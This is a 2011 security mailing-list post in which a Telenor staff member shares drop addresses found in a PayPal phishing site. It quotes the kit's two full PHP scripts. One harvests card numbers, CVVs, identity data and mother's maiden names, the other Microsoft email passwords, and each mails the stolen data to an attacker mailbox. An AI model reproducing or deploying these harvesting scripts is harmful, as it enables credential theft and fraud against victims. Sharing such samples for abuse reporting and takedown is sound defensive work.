[nsp-sec] Microsoft and Yahoo! dropbox

Helge Aksdal helge.aksdal at telenor.com
Wed Mar 2 05:34:29 EST 2011 

Hi,

These addresses were found in a Paypal phishing website:

Yahoo!:

<?
$ip = getenv("REMOTE_ADDR");
$message .= "--------------P2 (info)-----------------------\n";
$message .= "Full Name              : ".$_POST['fullname']."\n";
$message .= "Date of Birth m         : ".$_POST['bmonth']."/";
$message .= "Date of Birth d         : ".$_POST['bday']."/";
$message .= "Date of Birth y         : ".$_POST['byear']."/";
$message .= "Identity Number               : ".$_POST['id1']."\n";
$message .= "Phone             : ".$_POST['userphone']."\n";
$message .= "Mother's Maiden Name: ".$_POST['mmn']."\n";
$message .= "Address 1               : ".$_POST['address']."\n";
$message .= "City                    : ".$_POST['city']."\n";
$message .= "Country                : ".$_POST['country']."\n";
$message .= "Zip Code                 : ".$_POST['zip']."\n";
$message .= "Card Number               : ".$_POST['defaultcardnumber']."\n";
$message .= "Expiration Date         : ".$_POST['defaultexpmonth']."/";
$message .= "".$_POST['defaultexpyear']."\n";
$message .= "CVV code      : ".$_POST['cvv']."\n";
$message .= "Bank Name           : ".$_POST['issuingbank10']."\n";
$message .= "IP                      : ".$ip."\n";
$message .= "---------------Created By ^|MUST|KILL|^------------------------------\n";

$send = "loolool2011 at ymail.com";

$subject = "FULLZ";
$headers = "From: PPL<mustkill>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";

mail($send,$subject,$message,$headers);

header("Location: activation.htm");
?>

Microsoft:

<?
$ip = getenv("REMOTE_ADDR");
$message .= "--------------P2 (USER)-----------------------\n";
$message .= "Email              : ".$_POST['email']."\n";
$message .= "Password               : ".$_POST['password']."\n";
$message .= "IP                      : ".$ip."\n";
$message .= "---------------Created By ^|MUST|KILL|^-----------------------------\n";

$send = "a7asex at live.com";

$subject = "P2 ReZuLt";
$headers = "From: PPL<momo>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";

mail($send,$subject,$message,$headers);


header("Location: Processing.htm");
?>

-- 
Helge Aksdal 
Telenor

More information about the nsp-security mailing list